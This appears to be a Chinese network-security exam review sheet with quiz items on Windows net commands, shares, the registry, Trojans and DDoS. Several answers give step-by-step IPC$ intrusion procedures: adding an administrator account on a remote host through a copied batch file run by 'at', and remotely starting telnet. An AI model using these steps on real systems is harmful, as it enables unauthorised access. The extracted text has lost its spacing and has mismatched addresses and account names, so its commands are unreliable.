网络安全技术复习题 1216.docx
《网络安全技术复习题 1216.docx》由会员分享,可在线阅读,更多相关《网络安全技术复习题 1216.docx(15页珍藏版)》请在冰豆网上搜索。
网络安全技术复习题1216
1、下列不是WINDOWS默认共享_______。
A、C$B、IPC$C、ADMIN$D、WIN
2、Sniffer是______。
A、扫描工具B、嗅探工具
C、连接工具D、搜索工具
3、amdin$对应的目录是______(系统在D盘)。
A、d:
\windows\system32B、d:
\windows
C、d:
\programfileD、d:
\
4、建立账号stu的命令是______(密码是123)。
A、netuser123stuB、netuser123stu/add
C、netuse123stu/addD、netuserstu123/add
5、创建d:
\sun共享的命令是______。
A、netsharesu=d:
\sun/unlimit
B、netusesu=d:
\sun/unlimit
c、netusersu=d:
\sun/unlimit
d、netsharesu=\sun/unlimit
6、删除amdin$的命令是______。
A、netshareadmin$B、netshareadmin$=c:
\windows/del
C、netshareadmin$/delD、netuseadmin$/del
7、windows有一个自带的管理telnet工具,该工具是_________
A、tlntadmnB、telnet
C、instsrvD、system32
8、要能够进行远程注册表攻击必须_________。
A、开启目标机的service的服务
B、开启目标机的RemoteRegistyService服务
C、开启目标机的Server服务
D、开启目标机的RemoteRoutig服务
9、widows操作系统和硬件信息存在在注册表的__________。
A、HKEY_CLASSES_ROOTB、HKEY_CURRENT_CONFIG
C、HKEY_CURRENT-USERD、HKEY_LOCAL_MACHE
10、木马的最主要功能是______。
A、入侵B、远程控制
C、伪装D、隐蔽
11、灰鸽子是______木马。
A、第一代木马B、第二代木马
C、第三代木马D、第四代木马
12、冰河是______木马。
A、第一代B、第二代
C、第三代D、第四代
13、木马是______软件。
A、远程控制B、病毒软件
C、恶意软件D、邮件
14、木马是采用_____来控制远程机器的(c=Clients=Server)。
A、c控制sB、s控制c
C、c控制cD、s控制s
15、DDOS是______攻击。
A、远程攻击B、分布式拒绝服务C、请求拒绝D、溢出攻击
16、amdin$对应的目录是______(系统在D盘)。
A、d:
\windows\system32B、d:
\windows
C、d:
\programfileD、d:
\
17、建立共享成功的必要条件条件是______。
A、开放server服务B、开放Taskscheduler服务
C、开启Guest账号D、开放远程管理服务
18、netview命令查看的是______。
A、所有共享B、特殊共享
C、默认共享D、普通共享
20、删除账号stu的命令是______(密码是123)。
A、netuser123stuB、netuser123stu/del
C、netuse123stu/delD、netuserstu123/del
21、查看用户信息的命令是______。
A、netuseB、netuserC、netshareD、netuser
22、windows有一个自带的管理telnet工具,该工具是_________
A、tlntadmnB、telnet
C、instsrvD、system32
23、注册表项数据长为4个字节的是______类型。
A、REG-DWORDB、REG-EXPAND-SZ
C、REG-BINARYD、REG-SZ
24、打开注册表的命令是________。
A、registryB、regeditC、mmcD、reg
25、注册表文件的扩展名为_________。
A、、batB、、msC、、regD、、VB
26、windows下启动Telnet服务命令为____________
A、netstartB、netstarttelnet
C、starttelnetD、netstarttelnetservice
27、如果telnet192.168.10.100成功的话,则说明____。
A、目标主机telnet服务没开放B、目标主机的telnet服务停止
C、目标主机telnet服务端口是25D、目标主机的telnet服务端口是默认的
28、木马主动连接一定不能____________
A、内网控制外网B、外网控制外网
C、内网控制内网D、外网控制内网
29、木马自动上线一定不能____________
A、内网控制外网B、外网控制外网
C、内网控制内网D、外网控制内网
30、第三代木马使用______连接方式。
A、主动连接B、传统连接
C、正向连接D、反弹技术
31、删除共享的一般格式是______。
A、netshare共享名B、netshare共享名=绝对目录/del
C、netuse共享名/delD、netshare共享名/del
32、创建amdin$的命令是______。
A、netuseradmin$B、netshareadmin$=c:
\windows
C、netshareadmin$D、netuseadmin$
33、创建d:
\sun共享的命令是______。
A、netsharesu=d:
\sun/unlimit
B、netusesu=d:
\sun/unlimit
c、netusersu=d:
\sun/unlimit
d、netsharesu=\sun/unlimit
35、缓冲区溢出___
A、只是系统层漏洞B、只是应用层漏洞
C、既是系统层漏洞也是应用层漏洞D、只是TCP/IP漏洞
37、断开TELNET连接的命令___________。
A、exitB、quitC、escD、ctr+q
41、DDOS攻击是利用_____进行攻击
A、其他网络B、通讯握手过程问题
C、中间代理D、操作系统漏洞
42、黑客造成的主要安全隐患包括___。
A、破坏系统、窃取信息及伪造信息
B、攻击系统、获取信息及假冒信息
C、进入系统、损毁信息及谣传信息
D、通过内部系统进行攻击
43、计算机病毒是_____
A、计算机程序B、数据
C、临时文件D、应用软件
44、以下关于DOS攻击的描述,哪句话是正确的?
A、不需要侵入受攻击的系统
B、以窃取目标系统上的机密信息为目的
C、导致目标系统无法处理正常用户的请求
D、如果目标系统没有漏洞,远程攻击就不可能成功
45、windows有一个自带的管理telnet工具,该工具是_________
A、tlntadmnB、telnet
C、instsrvD、system32
1、IPC$的中文名称叫________命名管道
2、在本机用net查看用户信息的命令是:
netuser.
3、映射远程主机192.168.11.6C盘为本机Z盘的完整命令是netusez:
\\192.168.11.6\c$
4、查看本机共享情况的命令是netshare。
5、查看远程机器192.168.11.222普通共享情况的完整命令是netview\\192.168.11.222。
6、在远程机器192.168.1.23上把帐号stu加入administrators组的net完整命令是
Netlocalgroupadministratorsstu/add。
7、NTLM的认证方式包含0、1和2三种,方式_____表示先尝试用ntlm认证,如失败在用用户名和密码。
1
8、注册表中DWORD数据类型的长度为____个字节。
4
9、________命令是打开注册表。
regedit
10、灰鸽子是_________。
远程控制软件(或木马软件)
11、在本机用net工具建立帐号stu1完整命令是_______stu1123/add(密码是123)。
netuser
12、映射远程主机192.168.11.6主机上C盘为本机Z盘的完整命令是_______\\192.168.11.6\c$。
netuse
13、查看远程主机192.168.11.222的时间完整命令是\\192.168.11.222。
nettime
14、查看远程机器192.168.11.222所有共享情况的完整命令是\\192.168.11.222。
netshare
15、建立IPC$空连接的完整命令是(远程主机是192.168.0.1)netuse\\192.168.10.1\""/user:
""。
Ipc$
16、在远程机器192.168.1.23上把帐号stu加入administrators组的net完整命令是netlocalgroup____________stu/add。
Administrators
17、DDOS攻击是利用中间代理进行攻击,中间代理又叫________。
肉鸡
18、________命令是打开注册表。
regedit
19、命令_______打开微软控制台。
mmc
20、彩衣的目的是。
逃避杀毒软件的查杀
21、IPC$的中文名称叫。
ipc进程间通信
22.windows系统自带的telnet服务可执行文件的完整路径是_________。
c;\windows\system32\tlntsvr.exe
23、映射远程主机192.168.11.6C盘为本机Z盘的完整命令是netuse____
\\192.168.11.6\c$
z:
24、在本机用net工具建立帐号stu1完整命令是_______stu1123/add(密码是123)。
netuser
26、在远程机器192.168.1.23上把帐号stu加入administrators组的net完整命令是netlocalgroupstu____________。
/add
27、灰鸽子采用自动上线时,可以实现外网控制外网、内网控制内网和。
外网控制内网
28、跳板的含义是。
木马攻击的中间机器
29、DDOS是_____。
分布式拒绝服务
30、查看远程主机192.168.11.222的时间完整命令是\\192.168.11.222。
nettime
1、填写下表,写出下列服务的公认端口或功能描述
TCP
FTP
21
文件传输
TELNET
23
远程登录服务
HTTP
80
网页浏览
POP3
110
邮件服务协议
SMTP
25
邮件传送
SOCKS
108
代理服务
UDP
RPC
111
远程调用
SMMP
161
简单网络管理
TFTP
69
简单文件传输
2、写出将D盘下student目录共享的命令,共享名为stu。
Netsharestu=D:
\student/unlimited
3、命令netusez:
\\192.168.11.6\c$成功执行的结果是什么?
该命令的成功执行结果是在本地机器上多出一个盘符Z,Z盘实质上就是远程机器的C盘,在本地对Z盘的操作就等于对远程机器C盘的操作。
4、简述NTLM的认证方式。
NTLM认证方式有:
0:
不使用NTLM身份验证。
1:
先尝试NTLM身份验证。
如果失败,再使用passwd。
2:
只使用NTLM身份验证。
5、简述木马攻击的过程.
答:
①配置生成服务端
②种植木马
③上线,一般由主动和自动上线两种
④控制操作,实现攻击者的意图
6、ping命令的结果一般根据网络和目标机器不同,而不同,以下三个图分别表示最常见的三种,请根据以下三图回答问题:
图一
图二
图三
①、图一表示ping的结果如何?
②、图二最有可能是什么原因造成?
③、图三的原因有哪些?
答:
1、图一表示目标机畅通。
②、图二最有可能是不在线、关机或根本没有这样的机器。
③、图三的原因有硬件损坏或本机没有到达路由。
7、用IPC$入侵方法在远程主机192.168.11.1上建立一个帐号为STU2,并加入administrators过程
①、netuse\\192.168.11.1\ipc$“password”/user:
”admin”
②、建立文件hacker.bat,其内容:
netusers1123/add
netlocalgroupadministratorsstu/add
③、copyhacker.bat\\192.169.11.1\c$
④、nettime\\192.168.11.1(取得时间t)
⑤、at\\192.168.11.1t+3c:
\hacker.bat
8、简述三次握手的过程:
9、在本机用netuser命令建立帐号:
s1,并加入administrator组的过程。
netusers1123/add
netlocalgroupadministratorss1/add
10、映射远程主机192.168.11.6主机上C盘为本机Z:
的命令。
netusez:
\\192.168.11.6\c$。
11、开启远程机器192.168.11.8上telnet服务的方法。
①建立ipc连接
②连接管理远程计算机即打开计算机管理→操作→连接到另一台计算机
③在服务栏下开启telnet服务,同时可以更改启动类型
12、解释反弹技术
答:
①设置中间代理
②客户端(控制端)向中间代理注册本机的最新ip
③客户端开放监听端口,等待连接。
④服务端从中间代理取得控制端的最新ip地址,并发出建立连接请求,客户端同意连接,成功建立连接
13、利用bat远程开启telnet服务
①、建立ipc$连接,netuse\\192.168.17.2\ipc$“123”/user:
”zhangsan”
②、编写bat文件tel.bat
netstarttelnet
③、copytel.bat\\192.169.17.2\d$
④、nettime192.168.17.2(取得时间t)
⑤、at\\192.168.17.2 t+3d:
\tel.bat
注意:
这种方法开启的服务的启动方式不能为禁止
14、在校园的局域网中捕获到一个以太网帧,此帧的全部数据如下图所示,请对照相关协议的数据结构图,回答以下问题:
(1)此帧的用途和目的是什么?
地址解析协议的ARP查询。
(2)此帧的目的物理地址是ff:
ff:
ff:
ff:
ff:
ff,它属于(广播、单播)地址。
(3)它的目的IP地址是10.0.26.1,它属于(广播、单播)地址。
(4)此的源物理地址是00:
16:
76:
0e:
b8:
76。
(5)它的源IP地址是10.0.26.12,它属于(公网、私网)IP地址。
(6)此帧中封装的上层协议是ARP协议。
15、下图第四步传输什么内容:
答:
前三步是三次握手过程,第四步是请求的具体内容,比如网页,前三步是为第四步服务的。
16、将当前目录下hancker.bat文件拷贝到远程机器192.168.11.1里C盘的命令是什么?
copyhacker.bat\\192.169.11.1\c$
17、在本机用netuser命令建立帐号:
s1,并加入administrator组的过程。
netusers1123/add
netlocalgroupadministratorss1/add
18、解释反弹技术
答:
①设置中间代理
②客户端(控制端)向中间代理注册本机的最新ip
③客户端开放监听端口,等待连接。
④服务端从中间代理取得控制端的最新ip地址,并发出建立连接请求,客户端同意连接,成功建立连接
19、主动连接的过程.
答:
①服务端开放监听端口,等待连接。
②客户端(控制端)发出建立连接请求
③服务端同意连接,成功建立连接
20、下图是一台计算机访问一个Web网站时SNIFFER获取的数据包序列。
分析图中数据简要回答以下问题:
(1)客户机的IP地址是192.168.0.103,它属于(公网,私网)地址。
(2)Web服务器的IP地址是202.203.208.32,它属于(公网,私网)地址。
(3)客户机访问服务器使用的传输层协议是TCP,应用层协议是HTTP。
(4)客户机向服务器请求建立TCP连接的数据包的号数是1。
(5)在TCP的6比特的控制字段中:
[SYN]的含义是请求建立TCP连接。
[SYN,ACK]的含义是可以建立连接。
[ACK]的含义是确认。
21、IPC攻击是黑客常用的攻击方式,但需要复杂的连接和操作控制,例如查看目标机的共享情况、建立帐号、留下后面程序等等,请回答ipc攻击的以下步骤操作?
1)建立空ipc$连接的命令。
2)在本机用netuser命令建立帐号:
s1,并加入administrators组的过程。
3)查看远程主机192.168.11.222的时间命令
4)映射远程主机192.168.11.6主机上C盘为本机Z:
的命令
5)写出删除本机ipc$的命令
答:
①、netuse\\192.168.11.1\ipc$“password”/user:
”admin”
②、netusers1123/add
netlocalgroupadministratorss1/add
③、nettime192.168.11.1
④、netusez:
\\192.168.11.6\c$
⑤、netshareipc$/del
升级会员 